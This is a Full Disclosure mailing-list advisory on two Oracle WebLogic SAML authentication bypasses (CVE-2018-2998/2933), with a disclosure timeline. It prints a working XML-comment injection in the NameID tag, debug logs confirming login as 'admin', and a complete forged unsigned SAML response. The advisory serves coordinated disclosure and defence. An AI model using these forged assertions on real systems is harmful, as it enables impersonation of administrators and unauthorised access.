[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] Oracle WebLogic - Multiple SAML Vulnerabilities (CVE-2018-2998/CVE-2018-2933)

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] Oracle WebLogic - Multiple SAML Vulnerabilities (CVE-2018-2998/CVE-2018-2933)
From: Denis Andzakovic via Fulldisclosure <fulldisclosure@xxxxxxxxxxxx>
Date: Wed, 18 Jul 2018 16:42:31 +1200
Oracle WebLogic - Multiple SAML Vulnerabilities (CVE-2018-2998/CVE-2018-2933)

Release URL: 
https://pulsesecurity.co.nz/advisories/WebLogic-SAML-Vulnerabilities
Date Released: 18/07/2018
CVE: CVE-2018-2998 CVE-2018-2933
Author: Denis Andzakovic
Vendor Website: http://www.oracle.com  
Affected Software: Oracle Fusion Middleware 12c (12.2.1.3.0) WebLogic Server

--[ Description

Two vulnerabilities were discovered within the Oracle WebLogic SAML service 
provider authentication mechanism. By inserting an XML comment into the SAML 
NameID tag, an attacker can coerce the SAML service provider to log in as 
another user.  Additionally, WebLogic does not require signed SAML assertions 
in the default configuration. By omitting the signature portions from a SAML 
assertion, an attacker can craft an arbitrary SAML assertion and bypass the 
authentication mechanism.  

--[ SAML Authentication Bypass

By inserting an XML comment, an attacker can coerce the WebLogic SAML Service 
Provider to log in as another user. When an XML comment is added inside a 
NameID tag, the WebLogic server only processes the string after the comment. 
Adding the XML comment does not invalidate the SAML assertion’s signature.

For example; an attacker who can register the user attackeradmin with the 
identity provider may log in, tamper the resulting valid SAML assertion without 
invalidating the signature and gain access as the admin user. The following 
figure details the tampered assertion (the full assertion has been omitted for 
brevity):

<saml2:Assertion>
    <saml2:Subject xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
        <saml2:NameID 
Format="urn:oasis:names:tc:SAML:1.1:nameidformat:unspecified">attacker<!---->admin</saml2:NameID>
    </saml2:Subject>
</saml2:Assertion>

The following figure shows the relevant debug log lines. Complete log lines 
have been omitted for brevity:

<Debug> <SecuritySAML2Service> <weblogic.localdomain> <AdminServer> <[ACTIVE] 
ExecuteThread: '2' for queue: 'weblogic.kernel.Default (self-tuning)'> <<WLS 
Kernel>> <> <94584814-7693-4517-b1ce-d6cf53870dcb-00000043> <1524397013394> 
<[severity-value: 128] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > 
<BEA-000000> <BASE64 decoded saml message:_ommited_<saml2:NameID 
Format="urn:oasis:names:tc:SAML:1.1:nameidformat:unspecified">attacker<!---->admin</saml2:NameID>_ommited_
<Debug> <SecuritySAML2Atn> <weblogic.localdomain> <AdminServer> <[ACTIVE] 
ExecuteThread: '2' for queue: 'weblogic.kernel.Default (self-tuning)'> <<WLS 
Kernel>> <> <94584814-76934517-b1ce-d6cf53870dcb-00000043> <1524397013408> 
<[severity-value: 128] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > 
<BEA-000000> <DefaultSAML2NameMapperImpl: mapName: Mapped name: qualifier: 
null, name: admin>
<Debug> <SecuritySAML2Atn> <weblogic.localdomain> <AdminServer> <[ACTIVE] 
ExecuteThread: '2' for queue: 'weblogic.kernel.Default (self-tuning)'> <<WLS 
Kernel>> <> <94584814-76934517-b1ce-d6cf53870dcb-00000043> <1524397013408> 
<[severity-value: 128] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > 
<BEA-000000> <SAMLIACallbackHandler: callback[0]: NameCallback: setName(admin)> 


--[ SAML Insecure Defaults - Missing Signature Verification

In the default configuration, WebLogic does not require SAML assertions to be 
signed. If the signature section is omitted from a SAML response, then no 
signature verification is performed. This behavior can be used to bypass 
authentication and gain access as an arbitrary user.  The 
SingleSignOnServicesMBean.WantAssertionsSigned MBean attribute is not present 
by default.

In this default configuration, an attacker may remove the Signature tags from 
the SAML assertion, tamper the assertion (usually setting the ds:NameID to a 
target user) and log in as any user. The following XML shows an example SAML 
assertion for a user called ‘admin’ with the Signature tags removed.

<?xml version="1.0" encoding="UTF-8"?>
<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" 
Destination="http://localhost:7001/saml2/sp/acs/post"; 
ID="id39453084082248801717742013" IssueInstant="2018-04-22T10:28:53.593Z" 
Version="2.0">
    <saml2:Issuer xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" 
Format="urn:oasis:names:tc:SAML:2.0:nameidformat:entity">REDACTED</saml2:Issuer>
    <saml2p:Status xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol">
        <saml2p:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" />
    </saml2p:Status>
    <saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" 
ID="id3945308408248426654986295" IssueInstant="2018-04-22T10:28:53.593Z" 
Version="2.0">
        <saml2:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" 
xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">REDACTED</saml2:Issuer>
        <saml2:Subject xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
            <saml2:NameID 
Format="urn:oasis:names:tc:SAML:1.1:nameidformat:unspecified">admin</saml2:NameID>
            <saml2:SubjectConfirmation 
Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
                <saml2:SubjectConfirmationData 
NotOnOrAfter="2018-04-22T10:33:53.593Z" 
Recipient="http://localhost:7001/saml2/sp/acs/post"; />
            </saml2:SubjectConfirmation>
        </saml2:Subject>
        <saml2:Conditions NotBefore="2018-04-22T10:23:53.593Z" 
NotOnOrAfter="2018-0422T10:33:53.593Z" 
xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
            <saml2:AudienceRestriction>
                <saml2:Audience>WLS_SP</saml2:Audience>
            </saml2:AudienceRestriction>
        </saml2:Conditions>
        <saml2:AuthnStatement AuthnInstant="2018-04-22T10:28:49.876Z" 
SessionIndex="id1524392933593.694282512" 
xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
            <saml2:AuthnContext>
                
<saml2:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef>
            </saml2:AuthnContext>
        </saml2:AuthnStatement>
    </saml2:Assertion>
</saml2p:Response>


--[ Timeline

26/04/2018 - Advisory sent to Oracle  
26/04/2018 - Advisory acknowledged  
27/04/2018 - Case numbers S1003812 and S1003820 assigned to track the SAML 
authentication bypass and insecure defaults, respectively  
25/05/2018 - Automated email update received from Oracle  
23/06/2018 - Email from Oracle requesting a the disclosure for the insecure 
defaults to be delayed until at least October  
26/06/2018 - Automated email update received from Oracle  
05/07/2018 - Response sent to Oracle, advised the original disclosure date will 
remain  
14/07/2018 - Oracle advised both issues are fixed in the upcoming July 17th 
critical patch update  
18/07/2018 - Advisory released

--[  About Pulse Security
Pulse Security is a specialist offensive security consultancy dedicated to 
providing best in breed security testing and review services.

W: https://pulsesecurity.co.nz
E: info at pulsesecurity.co.nz


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Prev by Date: [FD] Capstone disassembler framework v3.0.5 is out!
Next by Date: [FD] CIRITICAL code injection vulnerability in National Instruments Linux driver package
Previous by thread: [FD] Capstone disassembler framework v3.0.5 is out!
Next by thread: [FD] CIRITICAL code injection vulnerability in National Instruments Linux driver package
Index(es):
- Date
- Thread